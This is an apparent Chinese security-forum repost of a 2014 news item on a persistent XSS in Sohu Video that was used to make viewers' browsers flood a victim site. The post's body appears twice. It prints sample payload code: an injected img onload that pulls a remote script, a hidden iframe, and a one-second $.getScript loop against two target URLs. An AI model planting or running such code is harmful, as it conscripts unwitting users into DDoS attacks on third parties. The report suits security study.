-
-
SOHU视频XSS漏洞导致其用户成为DDOS肉鸡
-
发表于: 2014-6-18 16:38 924
-
新闻链接:d51K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4A6G2L8X3g2Q4x3X3g2%4L8$3!0&6N6h3&6Q4x3X3g2G2M7X3N6Q4x3V1k6U0L8$3&6@1k6h3&6@1i4K6u0r3x3e0t1H3x3o6V1`.
新闻时间:2014-04-30 14:43
新闻正文:
from:6afK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3W2F1j5$3q4H3M7%4g2D9j5g2)9J5k6h3y4G2L8g2)9J5c8X3u0D9L8$3N6Q4x3V1k6%4L8%4u0D9k6q4)9J5k6r3I4S2M7X3N6W2M7%4c8Q4x3X3c8K6K9i4c8W2i4K6u0V1P5s2y4K6i4K6u0V1k6r3c8G2M7#2)9J5k6s2A6G2L8h3u0A6k6i4y4Q4x3X3g2Z5N6r3#2D9
incapsula发现其一个客户遭受了应用层的DDos攻击。
大概有22000的互联网用户对其网站发起了2000万的GET请求。
该攻击是利用的一个持久性XSS,通过找到一个访问量很大网站的xss,在其网站上插入一段js代码,当其用户访问网站之后,就可以利用该网站的用户对其受害者发起攻击。
几种示例代码:
// JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg" onload="$.getScript('598K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4Q4x3U0k6U0k6r3!0E0j5h3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2Z5N6r3#2D9i4K6t1%4i4K6t1&6" />
// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
$("body").append("<iframe id='ifr11323' style='display:none;' src='298K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4Q4x3U0k6U0k6r3!0E0j5h3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2Z5N6r3#2D9i4K6t1%4i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3W2X3M7X3q4E0k6g2)9J5y4X3N6@1i4K6y4n7"); }
// Ajax DDoS tool in executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('16eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8S2M7X3N6W2N6o6q4Q4x3X3g2U0L8$3#2Q4x3V1j5I4i4K6u0W2K9Y4m8Y4i4K6t1%4i4K6u0o6 'd08K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8S2M7X3N6W2N6o6u0Q4x3X3g2U0L8$3#2Q4x3V1j5I4i4K6u0W2K9Y4m8Y4i4K6t1%4i4K6t1&6i4K6y4n7
function ddos(url,url2){
window.setInterval(function (){
$.getScript(url);
$.getScript(url2);
},1000)
}
</script>
</body></html>
这种攻击方式在找到访问量巨大的视频网站的xss之后,非常好用,因为一般的视频时间不短,这样访问者在访问视频网站观看视频的时间段内,就不知不觉的成为攻击者的工具对其受害者网站不断的发送请求。
此次被利用的是sohu视频,全球网站流量排名27,可在视频区域插入xss代码,控制观看该视频的用户对受害者不断的发送请求。
注:攻击的效果就是每秒都请求一次url和url2指定的连接,如果一段视频30分钟,那么每个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求(如cc),如果是成千上万的人看个热门视频的话。。。
新闻时间:2014-04-30 14:43
新闻正文:
from:6afK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3W2F1j5$3q4H3M7%4g2D9j5g2)9J5k6h3y4G2L8g2)9J5c8X3u0D9L8$3N6Q4x3V1k6%4L8%4u0D9k6q4)9J5k6r3I4S2M7X3N6W2M7%4c8Q4x3X3c8K6K9i4c8W2i4K6u0V1P5s2y4K6i4K6u0V1k6r3c8G2M7#2)9J5k6s2A6G2L8h3u0A6k6i4y4Q4x3X3g2Z5N6r3#2D9
incapsula发现其一个客户遭受了应用层的DDos攻击。
大概有22000的互联网用户对其网站发起了2000万的GET请求。
该攻击是利用的一个持久性XSS,通过找到一个访问量很大网站的xss,在其网站上插入一段js代码,当其用户访问网站之后,就可以利用该网站的用户对其受害者发起攻击。
几种示例代码:
// JavaScript Injection in <img> tag enabled by Persistent XSS
<img src="/imagename.jpg" onload="$.getScript('598K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4Q4x3U0k6U0k6r3!0E0j5h3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2Z5N6r3#2D9i4K6t1%4i4K6t1&6" />
// Malicious JavaScript opens hidden <iframe>
function ddos(url) {
$("body").append("<iframe id='ifr11323' style='display:none;' src='298K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3y4Q4x3U0k6U0k6r3!0E0j5h3W2F1i4K6u0W2j5$3!0E0i4K6u0r3K9h3&6V1k6i4S2Q4x3X3g2Z5N6r3#2D9i4K6t1%4i4K6t1$3k6%4c8Q4x3@1u0Q4x3U0k6D9N6q4)9K6b7W2)9J5c8X3W2X3M7X3q4E0k6g2)9J5y4X3N6@1i4K6y4n7"); }
// Ajax DDoS tool in executes GET request every second
<html><body>
<h1>Iframe</h1>
<script>
ddos('16eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8S2M7X3N6W2N6o6q4Q4x3X3g2U0L8$3#2Q4x3V1j5I4i4K6u0W2K9Y4m8Y4i4K6t1%4i4K6u0o6 'd08K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4c8S2M7X3N6W2N6o6u0Q4x3X3g2U0L8$3#2Q4x3V1j5I4i4K6u0W2K9Y4m8Y4i4K6t1%4i4K6t1&6i4K6y4n7
function ddos(url,url2){
window.setInterval(function (){
$.getScript(url);
$.getScript(url2);
},1000)
}
</script>
</body></html>
这种攻击方式在找到访问量巨大的视频网站的xss之后,非常好用,因为一般的视频时间不短,这样访问者在访问视频网站观看视频的时间段内,就不知不觉的成为攻击者的工具对其受害者网站不断的发送请求。
此次被利用的是sohu视频,全球网站流量排名27,可在视频区域插入xss代码,控制观看该视频的用户对受害者不断的发送请求。
注:攻击的效果就是每秒都请求一次url和url2指定的连接,如果一段视频30分钟,那么每个用户都能在看视频这段时间内向两个目标分别发出 1800 次无意义的攻击请求(如cc),如果是成千上万的人看个热门视频的话。。。
赞赏
赞赏
雪币:
留言: